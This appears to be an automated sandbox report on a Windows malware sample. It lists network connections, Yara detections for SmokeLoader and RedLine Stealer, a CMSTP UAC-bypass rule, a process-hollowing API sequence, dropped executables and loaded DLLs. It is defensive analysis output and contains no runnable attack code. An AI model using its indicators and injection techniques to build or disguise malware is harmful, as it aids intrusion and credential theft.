Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:59815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:59728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:59812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.12:443 -> 192.168.2.6:60015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.193.11.2:443 -> 192.168.2.6:60394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:60439 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:60496 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:60812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:60815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:60809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:60834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.45:443 -> 192.168.2.6:60837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:60761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.12:443 -> 192.168.2.6:60884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:60917 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:60902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 223.29.45.10:443 -> 192.168.2.6:60881 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.10.133.119:443 -> 192.168.2.6:60926 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:60932 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:61045 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.193.11.2:443 -> 192.168.2.6:61051 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:61014 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 28.2.C53F.exe.880e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.C53F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.C53F.exe.890000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.2615942734.0000000002371000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.2552513633.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2456314399.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2615561764.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2140044524.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2140105329.0000000002481000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2457679800.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 21.2.288c47bbc1871b439df19ff4df68f076.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.288c47bbc1871b439df19ff4df68f076.exe.2e70e67.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.288c47bbc1871b439df19ff4df68f076.exe.3760000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000003.2546245866.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2690691611.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2682406576.0000000000843000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY

System Summary

Source: 13.2.9E0E.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 19.2.9E0E.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.0.AF26.exe.c20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects downloader / injector Author: ditekSHen
Source: 0000001C.00000002.2615942734.0000000002371000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001C.00000002.2615767161.0000000000AAB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000020.00000002.2982480618.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.2456314399.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000020.00000002.2981951494.00000000008AB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001C.00000002.2615561764.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2139812917.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000001B.00000002.2613214560.0000000002600000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2140044524.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2140105329.0000000002481000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001C.00000002.2615526346.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.2456240672.0000000000840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2139919357.0000000000ACD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000015.00000002.2688178585.0000000002A6F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2457679800.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.2457015789.000000000087D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000002.2371366172.000000000228E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000015.00000002.2690691611.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: C:\Users\user\AppData\Local\Temp\AF26.exe, type: DROPPED	Matched rule: Detects downloader / injector Author: ditekSHen

PE file contains section with special chars

Source: 98EC.exe.2.dr	Static PE information: section name: .&u&u
Source: 98EC.exe.2.dr	Static PE information: section name: .&u&u
Source: 98EC.exe.2.dr	Static PE information: section name: .&u&u

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_00401553 EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401553
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_00401561 EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401561
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_0040156B EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040156B
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_0040156F EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040156F
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401729
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_004023E5 NtQuerySystemInformation,	0_2_004023E5
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_00401583 EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401583
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_00401587 EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401587
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_004026A0 NtEnumerateKey,	0_2_004026A0
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_00401553 EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401553
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_00401561 EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401561
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_0040156B EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_0040156B
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_0040156F EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_0040156F
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401729
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_004023E5 NtQuerySystemInformation,	6_2_004023E5
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_00401583 EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401583
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_00401587 EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401587
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_004026A0 NtEnumerateKey,	6_2_004026A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_046B1668 NtCreateThreadEx,	8_2_046B1668
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_02450110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	9_2_02450110

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_04593AC8	8_2_04593AC8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_04592AF8	8_2_04592AF8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0459111C	8_2_0459111C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_04592CDC	8_2_04592CDC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_04591EF0	8_2_04591EF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_045930F0	8_2_045930F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_04594730	8_2_04594730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_045940A8	8_2_045940A8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_04593748	8_2_04593748
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_046B1668	8_2_046B1668
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_046B4065	8_2_046B4065
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_046B96B0	8_2_046B96B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_046B41F0	8_2_046B41F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_046B4E49	8_2_046B4E49
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_046B9458	8_2_046B9458
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_046B1156	8_2_046B1156
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_046B8AE0	8_2_046B8AE0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_046B534C	8_2_046B534C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_046B9C40	8_2_046B9C40
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_046B84C0	8_2_046B84C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_046B9950	8_2_046B9950
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_004090C6	9_2_004090C6
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_00410491	9_2_00410491
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_0040E54A	9_2_0040E54A
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_00407A4F	9_2_00407A4F
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_0040F6CA	9_2_0040F6CA
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_0040EA8E	9_2_0040EA8E
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_0040EFD2	9_2_0040EFD2
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D18B6B0	11_2_6D18B6B0
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D182D70	11_2_6D182D70
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1DAC29	11_2_6D1DAC29
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1B4EE0	11_2_6D1B4EE0
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1A4970	11_2_6D1A4970
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D168B30	11_2_6D168B30
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1D0B89	11_2_6D1D0B89
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1A4AC0	11_2_6D1A4AC0
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1A4550	11_2_6D1A4550
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1DA54D	11_2_6D1DA54D
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D16C7B0	11_2_6D16C7B0
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D16A7E0	11_2_6D16A7E0
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D166650	11_2_6D166650
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D17A0C0	11_2_6D17A0C0
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1C2310	11_2_6D1C2310
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1B63B0	11_2_6D1B63B0
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1B5DD0	11_2_6D1B5DD0
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1D5DD2	11_2_6D1D5DD2
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1A3C90	11_2_6D1A3C90
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1C1CA0	11_2_6D1C1CA0
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1D9FFC	11_2_6D1D9FFC
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1DBFF1	11_2_6D1DBFF1
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1A3E50	11_2_6D1A3E50
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1B5EB9	11_2_6D1B5EB9
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1DB964	11_2_6D1DB964
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1B5830	11_2_6D1B5830
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1B58D7	11_2_6D1B58D7
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1B58D5	11_2_6D1B58D5
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1D9AAB	11_2_6D1D9AAB
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1A3460	11_2_6D1A3460
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1B5050	11_2_6D1B5050
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1B5274	11_2_6D1B5274
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1A3260	11_2_6D1A3260
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_036E1029	11_2_036E1029
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_036E8029	11_2_036E8029
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_036E2957	11_2_036E2957
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_036EDFE0	11_2_036EDFE0
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_036E3C8B	11_2_036E3C8B
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_06C126F8	11_2_06C126F8
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_06C10EB3	11_2_06C10EB3
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_06C126DC	11_2_06C126DC
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_06C10930	11_2_06C10930
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B2EB2	12_3_018B2EB2
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018B3166	12_3_018B3166

Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: String function: 6D1C90D8 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: String function: 6D1C9B35 appears 141 times
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: String function: 6D1CD520 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: String function: 004044A4 appears 38 times

Source: D0F8.exe.2.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: E4FE.exe.2.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ccjteug	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ccjteug	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ccjteug	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: lz32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Section loaded: wininet.dll	Jump to behavior
